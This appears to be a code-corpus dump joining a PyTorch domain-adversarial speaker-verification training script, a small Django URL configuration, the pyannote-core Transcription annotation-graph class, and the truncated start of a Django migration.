parser.add_argument('--log-interval', type=int, default=1, metavar='LI',
help='how many batches to wait before logging training status')
parser.add_argument('--acoustic-feature', choices=['fbank', 'spectrogram', 'mfcc'], default='fbank',
help='choose the acoustic features type.')
parser.add_argument('--makemfb', action='store_true', default=False,
help='need to make mfb file')
parser.add_argument('--makespec', action='store_true', default=False,
help='need to make spectrograms file')
args = parser.parse_args()
# Set the device to use by setting CUDA_VISIBLE_DEVICES env variable in
# order to prevent any memory allocation on unused GPUs
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id
args.cuda = not args.no_cuda and torch.cuda.is_available()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# torch.multiprocessing.set_sharing_strategy('file_system')
if args.cuda:
torch.cuda.manual_seed_all(args.seed)
cudnn.benchmark = True
# create logger Define visulaize SummaryWriter instance
writer = SummaryWriter(logdir=args.check_path, filename_suffix='_first')
sys.stdout = NewLogger(osp.join(args.check_path, 'log.txt'))
kwargs = {'num_workers': args.nj, 'pin_memory': False} if args.cuda else {}
if not os.path.exists(args.check_path):
os.makedirs(args.check_path)
opt_kwargs = {'lr': args.lr,
'lr_decay': args.lr_decay,
'weight_decay': args.weight_decay,
'dampening': args.dampening,
'momentum': args.momentum}
l2_dist = nn.CosineSimilarity(dim=1, eps=1e-6) if args.cos_sim else PairwiseDistance(2)
if args.acoustic_feature == 'fbank':
transform = transforms.Compose([
concateinputfromMFB(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# varLengthFeat(),
to2tensor()
])
transform_T = transforms.Compose([
ConcateVarInput(num_frames=c.NUM_FRAMES_SPECT, remove_vad=args.remove_vad),
# to2tensor()
])
transform_V = transforms.Compose([
varLengthFeat(remove_vad=args.remove_vad),
to2tensor()
])
else:
transform = transforms.Compose([
truncatedinput(),
toMFB(),
totensor(),
# tonormal()
])
file_loader = read_audio
# pdb.set_trace()
torch.multiprocessing.set_sharing_strategy('file_system')
if args.feat_format == 'kaldi':
file_loader = read_mat
elif args.feat_format == 'npy':
file_loader = np.load
train_dir = EgsDataset(dir=args.train_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
test_dir = ScriptTestDataset(dir=args.test_dir, loader=np.load, transform=transform_T)
if len(test_dir) < args.veri_pairs:
args.veri_pairs = len(test_dir)
print('There are %d verification pairs.' % len(test_dir))
else:
test_dir.partition(args.veri_pairs)
valid_dir = EgsDataset(dir=args.valid_dir, feat_dim=args.feat_dim, loader=file_loader, transform=transform,
domain=args.domain)
def main():
# Views the training images and displays the distance on anchor-negative and anchor-positive
# test_display_triplet_distance = False
# print the experiment configuration
print('\nCurrent time is \33[91m{}\33[0m.'.format(str(time.asctime())))
print('Parsed options: {}'.format(vars(args)))
print('Number of Speakers: {}.\n'.format(train_dir.num_spks))
# instantiate model and initialize weights
kernel_size = args.kernel_size.split(',')
kernel_size = [int(x) for x in kernel_size]
padding = [int((x - 1) / 2) for x in kernel_size]
kernel_size = tuple(kernel_size)
padding = tuple(padding)
channels = args.channels.split(',')
channels = [int(x) for x in channels]
model_kwargs = {'embedding_size_a': args.embedding_size_a,
'embedding_size_b': args.embedding_size_b,
'embedding_size_o': args.embedding_size_o,
'inst_norm': args.inst_norm,
'resnet_size': args.resnet_size,
'num_classes_a': train_dir.num_spks,
'num_classes_b': train_dir.num_doms,
'channels': channels,
'avg_size': args.avg_size,
'alpha': args.alpha,
'kernel_size': kernel_size,
'padding': padding,
'dropout_p': args.dropout_p}
print('Model options: {}'.format(model_kwargs))
model = create_model(args.model, **model_kwargs)
start_epoch = 0
if args.save_init and not args.finetune:
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, start_epoch)
torch.save(model, check_path)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {}'.format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
filtered = {k: v for k, v in checkpoint['state_dict'].items() if 'num_batches_tracked' not in k}
model_dict = model.state_dict()
model_dict.update(filtered)
model.load_state_dict(model_dict)
#
# model.dropout.p = args.dropout_p
else:
print('=> no checkpoint found at {}'.format(args.resume))
ce_criterion = nn.CrossEntropyLoss()
if args.loss_type == 'soft':
xe_criterion = None
elif args.loss_type == 'asoft':
ce_criterion = None
        # Only --embedding-size-a/-b/-o are defined above, so the speaker branch is
        # sized with embedding_size_a for the margin-based classifier heads.
        model.classifier_spk = AngleLinear(in_features=args.embedding_size_a, out_features=train_dir.num_spks, m=args.m)
        xe_criterion = AngleSoftmaxLoss(lambda_min=args.lambda_min, lambda_max=args.lambda_max)
    elif args.loss_type == 'center':
        xe_criterion = CenterLoss(num_classes=train_dir.num_spks, feat_dim=args.embedding_size_a)
    elif args.loss_type == 'amsoft':
        ce_criterion = None
        model.classifier_spk = AdditiveMarginLinear(feat_dim=args.embedding_size_a, n_classes=train_dir.num_spks)
xe_criterion = AMSoftmaxLoss(margin=args.margin, s=args.s)
optimizer = create_optimizer(model.parameters(), args.optimizer, **opt_kwargs)
if args.loss_type == 'center':
optimizer = torch.optim.SGD([{'params': xe_criterion.parameters(), 'lr': args.lr * 5},
{'params': model.parameters()}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.finetune:
if args.loss_type == 'asoft' or args.loss_type == 'amsoft':
classifier_params = list(map(id, model.classifier.parameters()))
rest_params = filter(lambda p: id(p) not in classifier_params, model.parameters())
optimizer = torch.optim.SGD([{'params': model.classifier.parameters(), 'lr': args.lr * 5},
{'params': rest_params}],
lr=args.lr, weight_decay=args.weight_decay,
momentum=args.momentum)
if args.scheduler == 'exp':
scheduler = ExponentialLR(optimizer, gamma=args.gamma)
else:
milestones = args.milestones.split(',')
milestones = [int(x) for x in milestones]
milestones.sort()
scheduler = MultiStepLR(optimizer, milestones=milestones, gamma=0.1)
ce = [ce_criterion, xe_criterion]
start = args.start_epoch + start_epoch
print('Start epoch is : ' + str(start))
# start = 0
end = start + args.epochs
train_loader = torch.utils.data.DataLoader(train_dir, batch_size=args.batch_size, shuffle=False, **kwargs)
valid_loader = torch.utils.data.DataLoader(valid_dir, batch_size=int(args.batch_size / 2), shuffle=False, **kwargs)
test_loader = torch.utils.data.DataLoader(test_dir, batch_size=args.test_batch_size, shuffle=False, **kwargs)
# sitw_test_loader = torch.utils.data.DataLoader(sitw_test_dir, batch_size=args.test_batch_size,
# shuffle=False, **kwargs)
# sitw_dev_loader = torch.utils.data.DataLoader(sitw_dev_part, batch_size=args.test_batch_size, shuffle=False,
# **kwargs)
if args.cuda:
model = model.cuda()
for i in range(len(ce)):
if ce[i] != None:
ce[i] = ce[i].cuda()
print('Dropout is {}.'.format(model.dropout_p))
for epoch in range(start, end):
# pdb.set_trace()
print('\n\33[1;34m Current \'{}\' learning rate is '.format(args.optimizer), end='')
for param_group in optimizer.param_groups:
print('{:.5f} '.format(param_group['lr']), end='')
print(' \33[0m')
if epoch % 2 == 1 and epoch != (end - 1):
test(test_loader, valid_loader, model, epoch)
train(train_loader, model, ce, optimizer, epoch)
if epoch % 4 == 1 or epoch == (end - 1):
check_path = '{}/checkpoint_{}.pth'.format(args.check_path, epoch)
torch.save({'epoch': epoch,
'state_dict': model.state_dict(),
'criterion': ce},
check_path)
scheduler.step()
# exit(1)
extract_dir = KaldiExtractDataset(dir=args.test_dir, transform=transform_V, filer_loader=np.load)
extract_loader = torch.utils.data.DataLoader(extract_dir, batch_size=1, shuffle=False, **kwargs)
xvector_dir = args.check_path
xvector_dir = xvector_dir.replace('checkpoint', 'xvector')
verification_extract(extract_loader, model, xvector_dir)
verify_dir = ScriptVerifyDataset(dir=args.test_dir, trials_file=args.trials, xvectors_dir=xvector_dir,
loader=read_vec_flt)
verify_loader = torch.utils.data.DataLoader(verify_dir, batch_size=64, shuffle=False, **kwargs)
verification_test(test_loader=verify_loader, dist_type=('cos' if args.cos_sim else 'l2'),
log_interval=args.log_interval)
writer.close()
def train(train_loader, model, ce, optimizer, epoch):
# switch to evaluate mode
model.train()
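    # Gradient-reversal coefficient for the domain branch: the standard DANN-style
    # schedule 2 / (1 + exp(-10 * p)) - 1, with p = epoch / total epochs, ramps the
    # adversarial signal from 0 towards 1 as training progresses.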
lambda_ = 2. / (1 + np.exp(-10. * epoch / args.epochs)) - 1.
model.grl.set_lambda(lambda_)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
total_loss_a = 0.
total_loss_b = 0.
total_loss_c = 0.
total_loss = 0.
# for param_group in optimizer.param_groups:
# print('\33[1;34m Optimizer \'{}\' learning rate is {}.\33[0m'.format(args.optimizer, param_group['lr']))
ce_criterion, xe_criterion = ce
pbar = tqdm(enumerate(train_loader))
output_softmax = nn.Softmax(dim=1)
for batch_idx, (data, label_a, label_b) in pbar:
if args.cuda:
data = data.cuda()
data, label_a = Variable(data), Variable(label_a)
label_b = Variable(label_b)
logits_spk, feat_spk, logits_dom, feat_dom = model(data)
true_labels_a = label_a.cuda()
true_labels_b = label_b.cuda()
# pdb.set_trace()
# cos_theta, phi_theta = classfier
spk_label = logits_spk
        dom_label = logits_dom
if args.loss_type == 'soft':
spk_loss = ce_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'asoft':
spk_label, _ = spk_label
spk_loss = xe_criterion(logits_spk, true_labels_a)
elif args.loss_type == 'center':
loss_cent = ce_criterion(logits_spk, true_labels_a)
loss_xent = xe_criterion(feat_spk, true_labels_a)
spk_loss = args.loss_ratio * loss_xent + loss_cent
elif args.loss_type == 'amsoft':
spk_loss = xe_criterion(logits_spk, true_labels_a)
        dom_loss = (args.dom_ratio * ce_criterion(dom_label, true_labels_b))
loss = spk_loss + dom_loss
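        # Optional decorrelation term: penalize the squared cosine similarity between
        # the speaker and domain embeddings to push the two representations apart.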
if args.sim_ratio:
spk_dom_sim_loss = torch.cosine_similarity(feat_spk, feat_dom, dim=1).pow(2).mean()
spk_dom_sim_loss = args.sim_ratio * spk_dom_sim_loss
loss += spk_dom_sim_loss
predicted_labels_a = output_softmax(spk_label)
predicted_one_labels_a = torch.max(predicted_labels_a, dim=1)[1]
minibatch_correct_a = float((predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item())
minibatch_acc_a = minibatch_correct_a / len(predicted_one_labels_a)
correct_a += minibatch_correct_a
        predicted_labels_b = output_softmax(dom_label)
predicted_one_labels_b = torch.max(predicted_labels_b, dim=1)[1]
minibatch_correct_b = float((predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item())
minibatch_acc_b = minibatch_correct_b / len(predicted_one_labels_b)
correct_b += minibatch_correct_b
total_datasize += len(predicted_one_labels_a)
total_loss_a += float(spk_loss.item())
total_loss_b += float(dom_loss.item())
total_loss_c += float(spk_dom_sim_loss.item()) if args.sim_ratio else 0.
total_loss += float(loss.item())
# compute gradient and update weights
optimizer.zero_grad()
loss.backward()
if args.loss_type == 'center' and args.loss_ratio != 0:
for param in xe_criterion.parameters():
param.grad.data *= (1. / args.loss_ratio)
optimizer.step()
if batch_idx % args.log_interval == 0:
pbar.set_description(
'Train Epoch {:2d}: [{:4d}/{:4d}({:3.0f}%)] AvgLoss: {:.4f} SpkLoss: {:.4f} DomLoss: {:.4f} ' \
'SimLoss: {:.4f} Batch Accuracy: Spk: {:.4f}%, Dom: {:.4f}%'.format(
epoch,
batch_idx,
len(train_loader),
100. * batch_idx / len(train_loader),
total_loss / (batch_idx + 1),
total_loss_a / (batch_idx + 1),
total_loss_b / (batch_idx + 1),
total_loss_c / (batch_idx + 1),
100. * minibatch_acc_a,
100. * minibatch_acc_b))
print('\n\33[91mTrain Epoch {}: Avg loss: {:.4f} Spk Loss: {:.4f} Dom Loss: {:.4f} .'.format(epoch,
total_loss / len(
train_loader),
total_loss_a / len(
train_loader),
total_loss_b / len(
train_loader)))
print('Spk Accuracy:{:.4f}%, Dom Accuracy:{:.4f}%.\33[0m'.format(100 * correct_a / total_datasize,
100 * correct_b / total_datasize, ))
writer.add_scalar('Train/Spk_Accuracy', correct_a / total_datasize, epoch)
writer.add_scalar('Train/Dom_Accuracy', correct_b / total_datasize, epoch)
writer.add_scalar('Train/Loss', total_loss / len(train_loader), epoch)
torch.cuda.empty_cache()
def test(test_loader, valid_loader, model, epoch):
# switch to evaluate mode
model.eval()
valid_pbar = tqdm(enumerate(valid_loader))
softmax = nn.Softmax(dim=1)
correct_a = 0.
correct_b = 0.
total_datasize = 0.
for batch_idx, (data, label_a, label_b) in valid_pbar:
data = Variable(data.cuda())
# compute output
out_a, _, out_b, _ = model(data)
if args.loss_type == 'asoft':
predicted_labels_a, _ = out_a
else:
predicted_labels_a = out_a
predicted_labels_b = out_b
true_labels_a = Variable(label_a.cuda())
true_labels_b = Variable(label_b.cuda())
# pdb.set_trace()
predicted_one_labels_a = softmax(predicted_labels_a)
predicted_one_labels_a = torch.max(predicted_one_labels_a, dim=1)[1]
batch_correct_a = (predicted_one_labels_a.cuda() == true_labels_a.cuda()).sum().item()
minibatch_acc_a = float(batch_correct_a / len(predicted_one_labels_a))
correct_a += batch_correct_a
predicted_one_labels_b = softmax(predicted_labels_b)
predicted_one_labels_b = torch.max(predicted_one_labels_b, dim=1)[1]
batch_correct_b = (predicted_one_labels_b.cuda() == true_labels_b.cuda()).sum().item()
minibatch_acc_b = float(batch_correct_b / len(predicted_one_labels_b))
correct_b += batch_correct_b
total_datasize += len(predicted_one_labels_a)
if batch_idx % args.log_interval == 0:
valid_pbar.set_description(
'Valid Epoch: {:2d} [{:8d}/{:8d} ({:3.0f}%)] Batch Spk Accuracy: {:.4f}% Dom Accuracy: {:.4f}%'.format(
epoch,
batch_idx * len(data),
len(valid_loader.dataset),
100. * batch_idx / len(valid_loader),
100. * minibatch_acc_a,
100. * minibatch_acc_b
))
spk_valid_accuracy = 100. * correct_a / total_datasize
dom_valid_accuracy = 100. * correct_b / total_datasize
writer.add_scalar('Test/Spk_Valid_Accuracy', spk_valid_accuracy, epoch)
writer.add_scalar('Test/Dom_Valid_Accuracy', dom_valid_accuracy, epoch)
torch.cuda.empty_cache()
labels, distances = [], []
pbar = tqdm(enumerate(test_loader))
for batch_idx, (data_a, data_p, label) in pbar:
vec_a_shape = data_a.shape
vec_p_shape = data_p.shape
# pdb.set_trace()
data_a = data_a.reshape(vec_a_shape[0] * vec_a_shape[1], 1, vec_a_shape[2], vec_a_shape[3])
data_p = data_p.reshape(vec_p_shape[0] * vec_p_shape[1], 1, vec_p_shape[2], vec_p_shape[3])
if args.cuda:
data_a, data_p = data_a.cuda(), data_p.cuda()
data_a, data_p, label = Variable(data_a), Variable(data_p), Variable(label)
# compute output
_, out_a_, _, _ = model(data_a)
_, out_p_, _, _ = model(data_p)
# out_a = out_a_
# out_p = out_p_
out_a = out_a_.reshape(vec_a_shape[0], vec_a_shape[1], args.embedding_size_a).mean(dim=1)
out_p = out_p_.reshape(vec_p_shape[0], vec_p_shape[1], args.embedding_size_a).mean(dim=1)
dists = l2_dist.forward(out_a, out_p) # torch.sqrt(torch.sum((out_a - out_p) ** 2, 1)) # euclidean distance
# dists = dists.reshape(vec_shape[0], vec_shape[1]).mean(dim=1)
dists = dists.data.cpu().numpy()
distances.append(dists)
labels.append(label.data.cpu().numpy())
if batch_idx % args.log_interval == 0:
pbar.set_description('Test Epoch: {} [{}/{} ({:.0f}%)]'.format(
epoch, batch_idx * len(data_a), len(test_loader.dataset), 100. * batch_idx / len(test_loader)))
labels = np.array([sublabel for label in labels for sublabel in label])
distances = np.array([subdist for dist in distances for subdist in dist])
eer, eer_threshold, accuracy = evaluate_kaldi_eer(distances, labels, cos=args.cos_sim, re_thre=True)
writer.add_scalar('Test/EER', 100. * eer, epoch)
writer.add_scalar('Test/Threshold', eer_threshold, epoch)
mindcf_01, mindcf_001 = evaluate_kaldi_mindcf(distances, labels)
writer.add_scalar('Test/mindcf-0.01', mindcf_01, epoch)
writer.add_scalar('Test/mindcf-0.001', mindcf_001, epoch)
dist_type = 'cos' if args.cos_sim else 'l2'
print('\nFor %s_distance, ' % dist_type)
print(' \33[91mTest Spk ERR is {:.4f}%, Threshold is {}'.format(100. * eer, eer_threshold))
print(' mindcf-0.01 {:.4f}, mindcf-0.001 {:.4f},'.format(mindcf_01, mindcf_001))
print(' Valid Spk Accuracy is %.4f %%, Dom Accuracy is %.4f %% .\33[0m' % (spk_valid_accuracy, dom_valid_accuracy))
torch.cuda.empty_cache()
if __name__ == '__main__':
main()
| 44.822556 | 120 | 0.63267 | [
"MIT"
] | Wenhao-Yang/DeepSpeaker-pytorch | TrainAndTest/Spectrogram/train_domres_egs.py | 29,807 | Python |
""" Contains the urls for the maingui module"""
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('login', views.login, name='login'),
]
| 20.4 | 47 | 0.661765 | [
"BSD-3-Clause"
] | edgarceron/agent_console | maingui/urls.py | 204 | Python |
#!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2014 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# Hervé BREDIN - http://herve.niderb.fr
from __future__ import unicode_literals
import itertools
import networkx as nx
from networkx.readwrite.json_graph import node_link_data, node_link_graph
from time import T, TStart, TEnd
from segment import Segment
from json import PYANNOTE_JSON_TRANSCRIPTION
from util import pairwise
class Transcription(nx.MultiDiGraph):
"""Transcription stored as annotation graph"""
def __init__(self, graph=None, **attrs):
super(Transcription, self).__init__(data=graph)
self.graph.update(attrs)
def drifting(self):
"""Get list of drifting times"""
return [n for n in self if n.drifting]
def anchored(self):
"""Get list of anchored times"""
return [n for n in self if n.anchored]
def add_edge(self, t1, t2, key=None, attr_dict=None, **attrs):
"""Add annotation to the graph between times t1 and t2
Parameters
----------
t1, t2: float, str or None
data : dict, optional
{annotation_type: annotation_value} dictionary
Example
-------
>>> G = Transcription()
        >>> G.add_edge(T(1.), T(), speaker='John', speech='Hello world!')
"""
t1 = T(t1)
t2 = T(t2)
# make sure Ts are connected in correct chronological order
if t1.anchored and t2.anchored:
assert t1 <= t2
super(Transcription, self).add_edge(
t1, t2, key=key, attr_dict=attr_dict, **attrs)
def relabel_drifting_nodes(self, mapping=None):
"""Relabel drifting nodes
Parameters
----------
mapping : dict, optional
A dictionary with the old labels as keys and new labels as values.
Returns
-------
g : Transcription
New annotation graph
mapping : dict
A dictionary with the new labels as keys and old labels as values.
Can be used to get back to the version before relabelling.
"""
if mapping is None:
old2new = {n: T() for n in self.drifting()}
else:
old2new = dict(mapping)
new2old = {new: old for old, new in old2new.iteritems()}
return nx.relabel_nodes(self, old2new, copy=True), new2old
def crop(self, source, target=None):
"""Get minimum subgraph between source time and target time
Parameters
----------
source : Segment
target : float or str, optional
Returns
-------
g : Transcription
Sub-graph between source and target
"""
if isinstance(source, Segment):
source, target = source.start, source.end
source = T(source)
target = T(target)
# sorted list of anchored times will be needed later
# make sure it is computed only once
if source.anchored or target.anchored:
anchored = sorted(self.anchored())
# ~~~ from_source = set of nodes reachable from source ~~~~~~~~~~~~~~~~
# source is drifting
if source.drifting:
if source not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % source)
else:
from_source = {source} | nx.algorithms.descendants(self, source)
# source is anchored
else:
# if source is in graph, then it is easy
if source in self:
from_source = {source} | nx.algorithms.descendants(self, source)
# if source is not in graph,
# find anchored time just before source
else:
if source < anchored[0]:
from_source = set(self) # take no risk!
else:
before = [n for n in anchored if n <= source][-1]
from_source = {before} | nx.algorithms.descendants(self, before)
# ~~~ to_target = set of nodes from which target is reachable ~~~~~~~~~
# target is drifting
if target.drifting:
if target not in self:
raise ValueError(
'Drifting time %s is not in the transcription.' % target)
else:
to_target = {target} | nx.algorithms.ancestors(self, target)
else:
# if target is in graph, then it is easy
if target in self:
to_target = {target} | nx.algorithms.ancestors(self, target)
# if target is not in graph,
# find anchored time just after target
else:
if target > anchored[-1]:
to_target = set(self) # take no risk!
else:
after = [n for n in anchored if n >= target][0]
to_target = {after} | nx.algorithms.ancestors(self, after)
# union of source, target and source-to-target paths
nbunch = from_source & to_target
return self.subgraph(nbunch)
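    # Sketch: transcription.crop(Segment(10.0, 20.0)) keeps only the nodes that lie
    # on source-to-target paths between those two times (the local annotation subgraph).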
# =========================================================================
def _merge(self, drifting_t, another_t):
"""Helper function to merge `drifting_t` with `another_t`
        Assumes that both `drifting_t` and `another_t` exist.
Also assumes that `drifting_t` is an instance of `TFloating`
(otherwise, this might lead to weird graph configuration)
Parameters
----------
drifting_t :
Existing drifting time in graph
another_t :
Existing time in graph
"""
# drifting_t and another_t must exist in graph
# add a (t --> another_t) edge for each (t --> drifting_t) edge
for t, _, key, data in self.in_edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(t, another_t, key=key):
key = None
self.add_edge(t, another_t, key=key, attr_dict=data)
# add a (another_t --> t) edge for each (drifting_t --> t) edge
for _, t, key, data in self.edges_iter(
nbunch=[drifting_t], data=True, keys=True
):
# use lowest unused integer in case this key already exists
if self.has_edge(another_t, t, key=key):
key = None
self.add_edge(another_t, t, key=key, attr_dict=data)
# remove drifting_t node (as it was replaced by another_t)
self.remove_node(drifting_t)
def anchor(self, drifting_t, anchored_t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ D ] -- o ==> o -- [ A ] -- o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Anchor `drifting_t` at `anchored_t`
Parameters
----------
drifting_t :
Drifting time to anchor
anchored_t :
When to anchor `drifting_t`
"""
drifting_t = T(drifting_t)
anchored_t = T(anchored_t)
assert (drifting_t in self) and (drifting_t.drifting)
assert anchored_t.anchored
if anchored_t not in self:
self.add_node(anchored_t)
self._merge(drifting_t, anchored_t)
def align(self, one_t, another_t):
"""
Align two (potentially drifting) times
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
o -- [ F ] -- o o o
⟍ ⟋
==> [ F ]
⟋ ⟍
o -- [ f ] -- o o o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Parameters
----------
one_t, another_t
Two times to be aligned.
Notes
-----
* If both `one_t` and `another_t` are drifting, the resulting graph
will no longer contain `one_t`.
* In case `another_t` is anchored, `align` is equivalent to `anchor`.
* `one_t` and `another_t` cannot be both anchored.
"""
one_t = T(one_t)
another_t = T(another_t)
assert one_t in self
assert another_t in self
# first time is drifting
if one_t.drifting:
self._merge(one_t, another_t)
# second time is drifting
elif another_t.drifting:
self._merge(another_t, one_t)
# both times are anchored --> FAIL
else:
raise ValueError(
'Cannot align two anchored times')
# =========================================================================
def pre_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
p -- [ t1 ] p [ t1 ]
⟍ ⟋
==> [ t ]
⟋ ⟍
p' -- [ t2 ] p' [ t2 ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure --[t1] incoming edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
pred1 = self.predecessors(t1)
for p in pred1:
for key, data in self[p][t1].iteritems():
assert not data
# make sure --[t2] incoming edges are empty
# (for the same reason...)
pred2 = self.predecessors(t2)
for p in pred2:
for key, data in self[p][t2].iteritems():
assert not data
# let's get started (remove all incoming edges)
for p in pred1:
for key in list(self[p][t1]):
self.remove_edge(p, t1, key=key)
for p in pred2:
for key in list(self[p][t2]):
self.remove_edge(p, t2, key=key)
for p in set(pred1) | set(pred2):
self.add_edge(p, t)
self.add_edge(t, t1)
self.add_edge(t, t2)
def post_align(self, t1, t2, t):
"""
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ t1 ] -- s [ t1 ] s
⟍ ⟋
==> [ t ]
⟋ ⟍
[ t2 ] -- s' [ t2 ] s'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
t1 = T(t1)
t2 = T(t2)
t = T(t)
# make sure [t1]-- outgoing edges are empty
# because they're going to be removed afterwards,
# and we don't want to loose data
succ1 = self.successors(t1)
for s in succ1:
for key, data in self[t1][s].iteritems():
assert not data
# make sure --[t2] outgoing edges are empty
# (for the same reason...)
succ2 = self.successors(t2)
for s in succ2:
for key, data in self[t2][s].iteritems():
assert not data
# let's get started (remove all outgoing edges)
for s in succ1:
for key in list(self[t1][s]):
self.remove_edge(t1, s, key=key)
for s in succ2:
for key in list(self[t2][s]):
self.remove_edge(t2, s, key=key)
for s in set(succ1) | set(succ2):
self.add_edge(t, s)
self.add_edge(t1, t)
self.add_edge(t2, t)
# =========================================================================
def ordering_graph(self):
"""Ordering graph
t1 --> t2 in the ordering graph indicates that t1 happens before t2.
A missing edge simply means that it is not clear yet.
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect every pair of anchored times
anchored = sorted(self.anchored())
for t1, t2 in itertools.combinations(anchored, 2):
g.add_edge(t1, t2)
# connect every time with its sucessors
_g = g.copy()
for t1 in _g:
for t2 in set([target for (_, target) in nx.bfs_edges(_g, t1)]):
g.add_edge(t1, t2)
return g
def temporal_sort(self):
"""Get nodes sorted in temporal order
Remark
------
This relies on a combination of temporal ordering of anchored times
and topological ordering for drifting times.
To be 100% sure that one drifting time happens before another time,
check the ordering graph (method .ordering_graph()).
"""
g = nx.DiGraph()
# add times
for t in self.nodes_iter():
g.add_node(t)
# add existing edges
for t1, t2 in self.edges_iter():
g.add_edge(t1, t2)
# connect pairs of consecutive anchored times
anchored = sorted(self.anchored())
for t1, t2 in pairwise(anchored):
g.add_edge(t1, t2)
return nx.topological_sort(g)
# =========================================================================
def ordered_edges_iter(self, nbunch=None, data=False, keys=False):
"""Return an iterator over the edges in temporal order.
Ordered edges are returned as tuples with optional data and keys
in the order (t1, t2, key, data).
Parameters
----------
nbunch : iterable container, optional (default= all nodes)
A container of nodes. The container will be iterated
through once.
data : bool, optional (default=False)
If True, return edge attribute dict with each edge.
keys : bool, optional (default=False)
If True, return edge keys with each edge.
Returns
-------
edge_iter : iterator
An iterator of (u,v), (u,v,d) or (u,v,key,d) tuples of edges.
Notes
-----
Nodes in nbunch that are not in the graph will be (quietly) ignored.
For the same reason you should not completely trust temporal_sort,
use ordered_edges_iter with care.
"""
# start by sorting nodes in temporal order
nodes = self.temporal_sort()
# only keep nbunch subset (while preserving the order)
if nbunch:
nbunch = list(nbunch)
nodes = [n for n in nodes if n in nbunch]
# iterate over edges using temporal order
return self.edges_iter(nbunch=nodes, data=data, keys=keys)
# =========================================================================
def timerange(self, t1, t2, inside=True, sort=None):
"""Infer edge timerange from graph structure
a -- ... -- [ t1 ] -- A -- ... -- B -- [ t2 ] -- ... -- b
==> [a, b] (inside=False) or [A, B] (inside=True)
Parameters
----------
t1, t2 : anchored or drifting times
inside : boolean, optional
Returns
-------
segment : Segment
"""
t1 = T(t1)
t2 = T(t2)
# in case it is not provided, compute temporal sort
if sort is None:
sort = self.temporal_sort()
# if edge start is anchored, use it as start time
if t1.anchored:
start = t1
# otherwise, look for the closest anchored time in temporal order:
# - just after if inside is True
# - just before otherwise
else:
start = None
# find time index in temporal sort
istart = sort.index(t1)
# search just before or just after depending on 'inside' value
search = sort[istart+1:] if inside else sort[istart-1::-1]
for t in search:
if t.anchored:
start = t
break
# if we could not find any anchored time
            # use document end or start depending on 'inside' value
if start is None:
start = TEnd if inside else TStart
# same treatment for the other end of edge
if t2.anchored:
end = t2
else:
end = None
iend = sort.index(t2)
search = sort[iend-1::-1] if inside else sort[iend+1:]
for t in search:
if t.anchored:
end = t
break
if end is None:
end = TStart if inside else TEnd
# return a 'Segment'
return Segment(start=start, end=end)
# =========================================================================
def for_json(self):
return {PYANNOTE_JSON_TRANSCRIPTION: node_link_data(self)}
@classmethod
def from_json(cls, data):
graph = node_link_graph(data[PYANNOTE_JSON_TRANSCRIPTION])
mapping = {node: T(node) for node in graph}
graph = nx.relabel_nodes(graph, mapping)
return cls(graph=graph, **graph.graph)
# === IPython Notebook displays ===========================================
def _repr_svg_(self):
from notebook import repr_transcription
return repr_transcription(self)
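# Minimal usage sketch, assuming the conventions documented above
# (T(x) builds an anchored time, T() a drifting one):
#
#     G = Transcription()
#     t1, t2 = T(12.0), T()
#     G.add_edge(t1, t2, speaker='John', speech='Hello world!')
#     G.anchor(t2, 13.5)             # pin the drifting end time at 13.5 s
#     G.timerange(12.0, 13.5)        # -> Segment(12.0, 13.5)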
| 31.545611 | 84 | 0.522261 | [
"MIT"
] | Parisson/pyannote-core | pyannote/core/transcription.py | 18,353 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 09:21
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
